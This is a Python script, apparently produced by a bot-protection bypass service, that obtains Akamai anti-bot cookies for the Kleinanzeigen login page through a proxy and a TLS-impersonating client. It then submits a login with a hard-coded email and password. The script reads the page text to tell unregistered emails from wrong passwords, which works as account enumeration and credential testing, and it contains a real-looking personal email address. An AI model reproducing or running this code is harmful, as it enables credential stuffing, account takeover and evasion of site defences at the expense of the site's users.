from primp import Client

# -*- coding: utf-8 -*-
# Auto-generated by RiskByPass Task Panel
# Deps: pip install requests
import requests, time, json, sys

BASE_URL = "https://riskbypass.com"  # API base URL
TOKEN    = "Your Token"    # Access token (sent as x-api-key)
TIMEOUT  = 60                         # Timeout (seconds)

PROXY = "http://username:password@ip:port"

def run_task():
    payload = {
        "task_type": "akamai",
        "proxy": PROXY,
        "target_url": "https://www.kleinanzeigen.de/m-einloggen.html",
        "akamai_js_url": "https://www.kleinanzeigen.de/0Jjlt61L/lJq/ZR7/1T7tdQ5Yvk/uLN3VhXmw02JXcuG/FEF2AQ/URMF/O1RLRUw",
        "page_fp": "424543475255404d4244405a5f535a415c5148435e595f5b4e495c5046454445425a55495c5148435e4442475255404d4242425b5f52504d5c5148425e4442475255404d4247445c5f535a4a5c5148"
    }
    session = requests.Session()
    headers = {"Content-Type": "application/json", "x-api-key": TOKEN}

    print("Submitting task…")

    try:
        resp = session.post(f"{BASE_URL}/task/submit", headers=headers, json=payload, timeout=30)
        resp.raise_for_status()
        data = resp.json()
    except Exception as e:
        print("Submit request error:", repr(e))
        return

    if not data.get("ok"):
        print("Submit failed:", data)
        return

    task_id = data.get("task_id")
    if not task_id:
        print("No task_id in response:", data)
        return

    print("Submitted, task_id =", task_id)
    
    start_time = time.time()

    while True:
        if time.time() - start_time > TIMEOUT:
            print("Timeout (seconds)")
            return
        try:
            r = session.get(f"{BASE_URL}/task/result/{task_id}", headers={"Cache-Control":"no-cache"}, timeout=30)
            r.raise_for_status()
            j = r.json()
        except Exception as e:
            print("Polling error:", repr(e))
            time.sleep(1)
            continue

        st = j.get("status", "UNKNOWN")
        print("status:", st)

        if st in ("RUNNING", "QUEUED"):
            time.sleep(1)
            continue

        if st == "SUCCESS":
            print("SUCCESS, result:", json.dumps(j.get("result"), ensure_ascii=False, indent=4))
            return j.get("result")
        elif st == "FAILED":
            print("FAILED:", j.get("error", j))
            return
        elif st == "NOT_FOUND":
            print("NOT_FOUND: maybe invalid or recycled task_id")
            return
        else:
            print("UNKNOWN:", j)
            return

if __name__ == "__main__":
    results = run_task()

    cookies = results['cookies_dict']
    cookies['CSRF-TOKEN'] = '1082c9a1-e6e7-4654-854a-34bf1209d42d'

    email = 'meier.klaus3@web.de'

    headers = {
        'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'accept-language': 'en',
        'cache-control': 'no-cache',
        'content-type': 'application/x-www-form-urlencoded',
        'origin': 'https://www.kleinanzeigen.de',
        'pragma': 'no-cache',
        'priority': 'u=0, i',
        'referer': 'https://www.kleinanzeigen.de/m-einloggen.html?targetUrl=/',
        'sec-ch-ua': '"Google Chrome";v="143", "Chromium";v="143", "Not A(Brand";v="24"',
        'sec-ch-ua-mobile': '?0',
        'sec-ch-ua-platform': '"Windows"',
        'sec-fetch-dest': 'document',
        'sec-fetch-mode': 'navigate',
        'sec-fetch-site': 'same-origin',
        'sec-fetch-user': '?1',
        'upgrade-insecure-requests': '1',
        'user-agent': results['ua'],
    }

    data = {
        'targetUrl': '/',
        'loginWenkseSessionId': 'e127dcc0-c950-439c-a809-eb1709ef832f',
        'loginMail': email,
        'password': 'sadasdasd12',
        '_csrf': '1082c9a1-e6e7-4654-854a-34bf1209d42d',
        'fingerprint': '46b80606a3bc48301ecaf2b7b95c1fd8',
    }

    tls_requests = Client(proxy=PROXY, impersonate='chrome_133')
    response = tls_requests.post('https://www.kleinanzeigen.de/m-einloggen.html', cookies=cookies, headers=headers, data=data)
    print(response.status_code)
    if 'Diese E-Mail Adresse ist noch nicht registriert' in response.text:
        print('Email doesn\'t exist')
    elif 'Wir haben dein Nutzerkonto eingeschränkt. ' in response.text:
        print('Wrong password')
    else:
        print(response.text)